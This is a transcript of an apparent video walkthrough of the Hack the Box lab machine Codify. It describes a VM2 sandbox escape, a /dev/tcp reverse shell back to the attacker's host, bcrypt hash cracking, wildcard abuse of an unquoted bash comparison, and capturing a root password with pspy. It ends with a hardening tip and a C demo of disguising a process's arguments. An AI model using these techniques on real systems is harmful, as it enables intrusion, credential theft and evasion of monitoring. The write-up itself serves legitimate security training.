What's going on YouTube? This is Ipsec. I'm doing Codify from Hack the Box, which starts out with a web page that allows you to upload JavaScript and Node.js code and have it run the server and give you output. In order to try to do this securely, the author used the VM2 library, which is a sandbox and prevents things like file system calls or os.exec. However, the project is discontinued and there's some known vulnerabilities for bypassing the sandbox, so you can use that to get code execution on the box. Then once there, you have to do a lateral movement step by looking at the database, cracking a hash, and gaining access to a user. And that user has the ability to run a bash script as sudo. And the bash script itself has a vulnerability in how it does the if-then logic, so you can bypass it by just using a wildcard. You could also brute force the password if you wanted to, one character at a time. And then from there, it does a MySQL dump, and you have to examine the password. MySQL dump will mask the password, but if you use pspy, you can intercept it before. And then we'll go into exactly how MySQL spoofs arguments. So with that being said, let's jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it codify, then the IP address of 10.10.11.239. This can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have a web server. We have 2 web servers actually on port 80 and 3000. The first one is on Apache and it's redirecting us over to codify.htb. So I'm going to go ahead and add this to my host file. So let's do a sudo v etc host. And then we can add 10.10.11.239 codify.htb. And the second website is just a node website listing on port 3000. So let's go take a look at both sites. So I can do HTTP 10.10.11.239, redirects us to codify.htb. So let's try taking a look at this on port 3000 as well. And we get the same exact website on both of these. So I'm guessing this is Apache just being a proxy pass to port 3000. However, I'm not 100% positive. 3000 could be like a development version of the website that's running slightly different things. So just keep that in the back of the mind. If this was Nginx, I may test for like an off by slash vulnerability, thinking maybe the location didn't end in a trailing slash. But being Apache, I don't think that's vulnerable. So let's just go take a look at what this website is. It says test your Node.js code easily. This website allows you to test Node.js in a sandbox. If we go to try it now, we can try console.log hello world. And we can run that. We could try getting files. I think it's like, what is it? Require file system dot read files sync. I think this is it. And then we want to say UTF-8. I think that's correct JavaScript. Go run, and we get module fs is not allowed. So they have some type of filter in play that is preventing us from escaping whatever sandbox it's running in. So they're doing some type of security here. So let's go back to the website to see more about what it is. And let's see. It uses sandboxing technology to run the code. It's executed in a safe and secure environment. It says there are some limitations. So if we click here, we can see the restricted modules is FS, so we can't access the file system and child process. They've whitelisted these modules, so it is potential that we could use these modules to execute code. But first, I want to see if there's any way to identify exactly how they are doing the whitelist, because I don't want to go do a bunch of research on each of these modules, right? It's possible that like in Node.js, if you gave it like a file : / it would treat that file like, or that URL like a local file. Like I think in Firefox, if I do this, right? This is a URL, but it shows the file. I don't think that's the case with the URL module off the top of my head. But if we click around, if we go to the About Us, it has an About a code editor, and it says the VM2 library is widely used and trusted tool for sandboxing JavaScript. And if we click over to this, it brings us to a GitHub repository. And going to the parent project, instead of the release, we can see the project is discontinued. and it's discontinued because it contains critical security issues. It recommends using isolated VM instead. So no longer really that trusted. If we look at it, that README was updated, let's see, where is it? 9 months ago. So it looks like it's been decommissioned relatively recently. If we go over in the known security issues, we have a bunch created around July 2023. So if we go to the first one, it's a sandbox escape, and they give a proof of concept. So clicking over on the POC, we have this code. So let's just copy and paste and see what it does. So I'm going to go back to Codify. Let's try it now. We can paste this. And instead of touching pwned, I just want to say, we'll do ID, see if it can echo the user. So we go to run, and we just get this object back that says it's a promise. And in JavaScript, promises are just something that promises to return something eventually. It's an asynchronous operation. So we'd have to like put a then statement before this catch and do a bunch of fancy stuff to try to catch it and get the output. It's a big pain. So instead of doing that, I'm just going to look at the other escapes to see if any of them don't use promise. So this one, talking about the promise handler. This one, let's see, in sandbox specification of proxy, does this have promise in it? Does not have promise. So let's go to this POC and run this. Sandbox escape, where is it? Here's the editor. And there we go. We have the output here. So if I just do ID, we can see the user. So let's just try getting a reverse shell because I don't feel like living in this web browser. So I'm going to do --c, then single quote --i, dev TCP 10.10.14.8, port 9001, 0 and 1 like that. And then let's make sure our shell is listening. So nc lvnp 9001, run this, and we get a shell back. Awesome. So let's just upgrade this so I have like tab autocomplete. So Python 3-c import pty, then pty spawn bin bash, control Z, stty raw minus echo, fg, enter, enter. And there we go. I have a proper shell that I can clear. And I'm just confused because I have color. I'm not used to seeing this. Echo term. Okay. So I automatically identified a terminal as tmux 256 color. Not exactly sure why it did this, and most reverse shells don't, but hey, I'm not going to complain. So let's see, what do we want to do first? If we do pwd, we are home svc. The main thing, I want to see exactly how that Apache is working. So let's go etc Apache 2, and then what is it? Sites enabled, and we can look at the default, and we see it's just a straight proxy pass to localhost 3000. So I'm guessing there's no like development version of the website. The Apache and port 3000 is the same thing. We can look at all the ports on the box, and we see MySQL. PM2 is running. This is like the node way to run projects. I bet if I did like PM2 list, we'd see all the workers for this, right? But let's see. MySQL is a bit odd because I haven't seen like a login functionality, anything that would require a database. If we do psef -forest, I'm going to do less -S. So it puts everything on one line. I can go left, right. My terminal size is a little bit off, so this less looks a bit funny. So let's go fix that. I'm going to do stty-a so I can see rows 28, columns 110. So if I just do stty rows 28, cols 110, now I do that same less command, it looks a bit better. So if I didn't do the -s right here where we have it going off the screen, I wouldn't be able to hit the right arrow and see all the output. So let's see. We see Docker. I don't know what Docker is running. It looks like it's just the MySQL database. Let's see. We have var www editor index.js. So I'm guessing this is where the node application lives. We have more. This is our reverse shell. and nothing really else there. So let's see. If I go and look at var dub, there's a contact editor in HTML. So if we go into editor, this is the main website. But if we go over to contact, there is another site that I don't think is being used. If we do ps-ef grep on editor, we can see all the workers there. If we grep on contact, we don't see anything. So this website looks like it is no longer in use, but there is a database. So we have tickets.database. So I'm going to do SQLite and then tickets.db.dump. So we can just dump the database, and we see there is a user, Joshua. He has a bcrypted hash right here for a password, it looks like. And we see 2 tickets. Tom Hanks says they need networking modules. Joe Williams wants it to be run locally. But let's just see if we can crack Joshua's password. So I'm going to go over to the Kraken, which is just a box on my local network that I use to crack hashes. I just don't like running Hashcat on my main PC as I record because it could lead to like drop frames and things like that. So I have a separate box for that. Let's do v hashes / codify dot. I'm just going to call this bcrypt. Let's do / hashcat. The file and then word list. I'll just use rocku. And let's see if it cracks. It looks like we'll have to specify the actual mode because the auto detect failed. I'm going to do 3200 because this is what the hash looks like. It could be a forum, CMOS, e-commerce, but just looking at like these files, I don't think it's a main like forum or something like that. I don't even see like a .git directory or anything. So let's just do -m 3200 because that's going to be the most common. And it looks like we have started. It's initializing the backend runtime. And then once this happens, it will start the crack and we'll see if we get any results off of this. So there we go. It has started and already finished. And we get the password as SpongeBob1. So let's go ahead and test out that password. So if I do su-joshua, type in SpongeBob1, we get logged in. And there is user.txt. We could have also just SSH'd, right? There's nothing that stops us from doing SSH Joshua at codify.htb and then putting in the password there and logging in this way. So as Joshua, let's see what we have. Bash histories to dev null. If we do sudo-l, we can see we can run the script MySQL backup. So let's take a look at this. So right off the bat, we're going to set db user to root, and then we have the password. It's going to cat/root/.creds. So if we try to cat this, permission denied. So the sudo rule is what's allowing us to populate that field. And then we have the backup directory, var backups MySQL. So let's go var backups MySQL, permission denied. Okay. And then it's going to ask us to read in the password. So this is going to set whatever we type to be user pass. Then we have this if then loop, and this is actually going to be vulnerable because this user pass is on the right side of this and it's not quoted. Then we have a make dir. It's going to do MySQL. And right here is the second vulnerability because we can see the processes by other users by just doing a ps-ef, right? And it's putting the MySQL password just on the command line. So if we run APS as this command runs, we'll be able to see this variable, which is the contents of root.creds. So that will get us that password, and maybe that's also the root password. We don't know yet, but let's just try that. Let's see. Because it's either the root password or that will allow us to log into the database, and then we can poison it to do something else. But I'm guessing that's going to be a password reuse. I actually do not remember. So let's talk about this. This is vulnerable because it's doing I forget the word. Let's see. Bash common pitfall. It's not like regex. It's like a fuzzy comparison. There we go. This is the wiki I wanted. If this actually loads, hopefully the page loads. It's going awfully slow. I guess while it loads, we can show this. So let's do this. I'm going to call it pwn.sh, bin bash. Okay. Let's see. How do we want to do this? I'm just going to say if it's confirmed. And we can say user pass is equal to 1. We'll just pass it to the first argument. And we'll say db pass is equal to please subscribe. So if I run this chmod plus x pwn, let's see what happens. So if I do pwn.sh, please subscribe, we have password confirmed. Let me just put this on the top. If I do please subscribe to, it doesn't work. But it does have special characters. So if I do a question mark, like that replaces any character, right? This slash isn't going to work just because of how we did it. This is actually kind of funny. So if we wanted to put in some debugging, we could say entered like this. So this will let us see what we put in. If I do the asterisk, it's saying nmap because bash is actually reading this and it's a special character. So it's grabbing the first directory it sees. So if we wanted to use that, we'd have to put it in single quotes. Oddly enough, when I do the echo, it echoes this, but I don't understand what's going there, but it still processes it, right? So that's the vulnerability. If this was in quotes, then it's not going to work, right? And also, if user pass is on the other side, it's not going to work. Bash is a weird language. So if we just go equals equals db, db pass, and let's get rid of this. Right. So that is the vulnerability. This never loaded. I'm pretty sure this is the page I went to. Let's see. Is this going to be like a commit of it? Yeah. Let's see. Is this here? Right here. 34. Oh, this is redirecting us to that wiki. Stop. 34 period. There we go. Pattern matching is what it calls it, right? So that is that vulnerability. Let us exploit this now. So let's see. If we do sudo -l, we can say sudo this. Put in any password. It failed. I'm going to put in a star, and it runs. So let's run tmux. I'm going to hit my magic key, which is Control B twice, so it goes into my nested tmux session. And then we can do a for I in sec. Let's run it 100 times. Do psef grep MySQL. Done. I'm going to add a sleep for half a second. Okay, so let's do sudo -l, SpongeBob1, sudo this. I'm going to enter star. Let's go up, run this, and then run this command. And there we go. And we can see MySQL is actually doing some type of filtering here. Like it's smart enough to say, hey, I don't want to output this on the standard out, so it's going to censor this. I want to say if we do piece by, it's automatically not going to do that. But we could also go in/proc and on this PID and get it that way. But I think piece by is going to be the easier option. Let's just try that real quick. So let's do make dir dub dub dub. And then we can say cp opt piece by. Do I not have it here? I guess I don't. Piece by GitHub. Let's go over to releases. Let's download it. wget. chmod. Oh, we just have to stamp the web server. Okay. Let's do wget 10 10 14 8 8000 piece by 64. chmod plus x. Run it. Then let's go here. And there we go. Piece by was able to capture the password. So we have this as the password of MySQL. Let's do su dash. And we get root. Awesome. So that is the box. That was a bit quick. Let's see if we can exactly remember how we unmask that manually. But not the end of the video. I do want to talk about a little quick hardening tip, and that is in Linux, there is a hide proc flag that you can add to like fstab that will hide the process of other users. So if we just Google like hide proc fstab, go over to the Linux system hardening, and it will tell us how we can set that. And normally you should reboot. If you edit like fstab, you want to reboot for it to take effect, but we could just remount /proc right away. So what this is going to do is kill the permissions for the Joshua user or any user to be able to go into another user's process. I don't think it kills it for root because root can access everything. But if we just do like a ps-ef command, we can see what's running from every user on the box, right? There's no reason for us to know like LXD is running MySQL, root is running this, right? We see all the processes. So if we, whoops, I had clipboarded that. Let's copy this. Nope. There we go. So if we remount /proc to have hide PID equals 2, now the permissions are going to change on the /proc directory, and we can only see things that we have started. If we do lsla on /proc, do we even see the PIDs? We don't even see the PID, like the directories here, right? We only see our directories. So that is a really good thing to do just on Linux boxes if you want to prevent users from seeing processes by other users. Let's see, can root see anyone? If we do ps-ef grep Josh, yeah, root can still see everyone's process. So if we did that, now we can exit out of that. So I'm Joshua on this. If I run piece by again, and we do this sudo, let's see. Okay. We enter the password, and we don't see anything because piece by doesn't have permission to go into the MySQL process and look at the command line, right? So that is a good way to prevent some of those issues. It's not bulletproof, right? The correct answer is just never pass the password as an argument because you don't know if that's being logged in the history file other places, right? But I do think it is good practice to remove the ability for users to see other users' processes. So now let's go just talk about exactly what MySQL is doing, because a lot of people don't realize that you can just easily rewrite the argument if you are the program. So let's show that real quick. Let's just make a directory demo, I guess. CD demo here. Okay, so let's start the program. We just have to create a main function, and we want to pass it the arguments, right? And we pass argv like this. I did not type a v. There we go. And let's see. What we want to do first is just print the PID. So I'm just going to do a printf, and then we can say PID is equal to a number. We can say get PID like that. Close that off. Return 0. And we need to just create a loop. So all this for command is going to do is make me control C out of the program. It's a hacky way to do like an infinite loop. So let's do it includes, since we use printf, we need string. We need standard IO and the final one. Okay, let's see. Can we compile this? Okay. So if I execute it, we see the PID is 6985, and I do a psef grep on 6985. We can see a.out, right? We could also do cat/proc 6985 cmd line, and we see that. But what this really is just a memory address, and the running program has the ability to overwrite what that is. So essentially what MySQL is doing is it's looping through all the command line flags and looking for where the password is passed, and then it's changing that to be just all X's, right? So in order to start this off, we have to get where the pointer is. So let us do a char argv0 is equal to argv like that. And all this is going to be where argv's location is. So we can just say argv, and that's now a pointer, argv0 like that. So at this memory location is where a.out begins, right? That's what that's saying. So what we want to do now is loop through all the arguments. So we can just say, let's declare two variables, the iterator and a length. Then we can say for I0 because we start the argument starts at 0. And then we go until we're greater than the argument counter. And every time we increment by 1. Okay. And now we just want to do printf argument, and we'll say that's a string argvi like this. I just want to make sure this works. And we're getting the arguments, right? We have a.out there. If we do please subscribe, this is argv0, argv1, right? So we can overwrite or read each of these. So it's just looking for where an argument is -p for the password, and then goes to the next one and does what we're about to do. So now that we have that, let's grab the length. So we'll do the strlen. So we get the length of what the argument is, and then let's just set it to be all zeros. Okay, like that. I think that is correct. Typo. Okay. So what do you think is going to happen when we do a psef grep on 7030? There's nothing here. It looks like it's all blank because we just rewrote everything to be null. If we go in proc 7030 and cat cmd line, again, it looks blank. But if we do an xxd, we can see it's not really blank. We just overwrote everything with a null byte, and Bash doesn't show that, right? We could have done memset and was it 42? Let's see what happens here. And then PSEF grep 7047. It's all stars, right? And this is ./a.out, and this is please subscribe. So we have just erased that, right? If you're curious, if we go man ASCII, search 42, let's see, the star right here. What format is that? It is the decimal version, right? So if we wanted to put that as what MySQL did, which was X's, that is 120. So if we replace this to be 120, PSEF grep 7075, it's now all X's. So the other thing we could also do is just change this to be whatever we want. Let's say str copy argv0, and we're going to write thank you for watching the video. That's going to be the new argument. Because I already know you subscribed after I asked you to, right? So let's run this again. If we do a ps-ef grep 7086, because I wonder if it's because this is too long. Let's see. PSEF. I'm confused right now. 7100. I thought I could overwrite argv that way. Let's null that out. Was I not saving it? No, I was. Okay, I am screwing something up here. Oh, I am an idiot. This is where it's like breaking, so we can't control C. Okay. PSEF grep 7133. So we overwrote the first argument. Right. Thanks for watching the video. Okay. And there we go. We have completely overrode it. And that's how you can make your program be like appear to be anything you want, right? So if we did PSEF, let's see, we can probably make it look like this. So let's say argv0. Boom. Because I know most people, when they see something that has like, that looks like this and is a process, they tend to ignore it, right? So PSEF grep 7157. We have it there. There's some X's left over because this isn't long enough, right? We could fix that by just like making the X's nulls or doing other things. But you should get the point of that, right? You could also just take a longer string, right? So this one, then we'll overwrite those X's. But that's all MySQL's doing, is when it boots up, it is going through all the arguments and doing a rewrite. And pspy is using inotify, so it hooks /proc, and whenever the file system creates a new directory, because it creates a directory for creating a new process, it notifies pspy, and pspy will immediately go look at CMD line. So it's reading CMD line before MySQL can manage to overwrite it, right? So that is a somewhat stealthy way, or I don't know if it's stealthy, but a way you can just overwrite the argument and appear as something else. So hope you guys enjoyed that tidbit. Take care, and I'll see you all next time.